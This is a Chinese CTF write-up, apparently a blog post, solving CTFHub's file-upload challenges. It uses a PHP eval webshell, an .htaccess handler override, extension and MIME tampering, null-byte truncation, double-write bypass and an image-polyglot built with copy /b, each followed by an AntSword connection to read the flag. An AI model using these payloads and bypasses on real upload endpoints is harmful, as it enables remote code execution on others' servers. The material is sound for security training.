CTFHUB:文件上传全部题目

目录

无验证

前端验证

.htaccess

MIME 绕过

00 截断

双写绕过

文件头检测


无验证

开启题目

1.php 一句话木马内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马,发现上传成功

蚁剑连接

http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.php

在 “/var/www/html/flag_1791214435.php”发现了 flag

前端验证

开启题目

上传一个 1.jpg,内容是

<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.php

在“/var/www/html/flag_333327672.php”发现了 flag

.htaccess

开启题目

 .htaccess 文件内容:
 <FilesMatch "jpg">
 SetHandler application/x-httpd-php
 </FilesMatch>

 1.jpg内容:
 <?php @eval($_POST[cmd]);?>

先上传 .htaccess 文件,再上传 1.jpg 一句话木马

蚁剑连接

在“/var/www/html/flag_121311308.php”发现了 flag

MIME 绕过

开启题目

1.jpg内容:
<?php @eval($_POST[cmd]);?>

上传 1.jpg 一句话木马,抓包,修改后缀为 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_763422378.php”找到了 flag

00 截断

开启题目

查看页面源代码,发现接受值是 get

1.php内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马 1.php,抓包,修改后缀为 jpg,添加 1.php%00

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_177321091.php”找到了 flag

双写绕过

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马 1.php,抓包,双写 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_484225427.php”找到了 flag

文件头检测

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

截屏截一个很小很小的图片,保存为 png 格式,把 1.png 和 1.php 放在同一文件夹,在此目录打开 cmd, 使用以下命令把 1.png 和 1.php 合成为图片马

copy 1.png /b + 1.php /a shell.png

上传图片马 shell.png,抓包,修改后缀为 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_213312434.php”找到了 flag

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值